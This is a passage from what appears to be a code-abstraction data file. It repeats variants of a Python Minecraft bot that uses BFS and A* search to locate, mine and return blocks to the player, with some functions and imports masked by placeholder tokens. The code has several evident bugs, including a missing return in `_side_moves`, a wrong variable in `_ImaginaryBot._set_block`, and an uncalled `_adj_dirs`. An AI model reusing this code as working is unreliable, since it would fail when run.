_key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\n<function token>\n<function token>\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\n<function token>\n<function token>\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass 